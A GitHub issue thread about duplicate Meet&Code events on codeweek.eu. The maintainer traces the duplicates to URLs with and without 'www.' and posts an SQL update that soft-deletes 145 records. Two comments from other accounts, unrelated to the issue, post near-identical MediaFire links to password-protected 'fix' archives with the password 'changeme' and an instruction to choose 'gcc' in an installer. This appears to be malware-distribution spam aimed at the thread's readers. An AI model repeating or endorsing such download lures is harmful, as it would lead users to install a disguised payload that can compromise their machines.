### ISSUE TITLE
Duplicate events being imported from Meet&Code ?

### ISSUE THREAD

**Issue by alainvd** [codeeu/codeweek#2262]
https://codeweek.eu/view/602562/3d-bogenschiessspiel
https://codeweek.eu/view/602681/3d-bogenschiessspiel

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alainvd** [comment]
reason of duplicates: urls are different; one has www. and the other one is without the .www

**Comment by alainvd** [comment]
SQL run:
UPDATE events
SET deleted_at = NOW()
WHERE event_url IN (
    SELECT link
    FROM (
        SELECT MIN(link) AS link, REPLACE(link, 'www.', '') AS normalized_link, COUNT(*) AS count
        FROM meet_and_code_r_s_s_items
        GROUP BY normalized_link
        HAVING count > 1
    ) AS temp_table
) and deleted_at is null;

>> 145 records updated
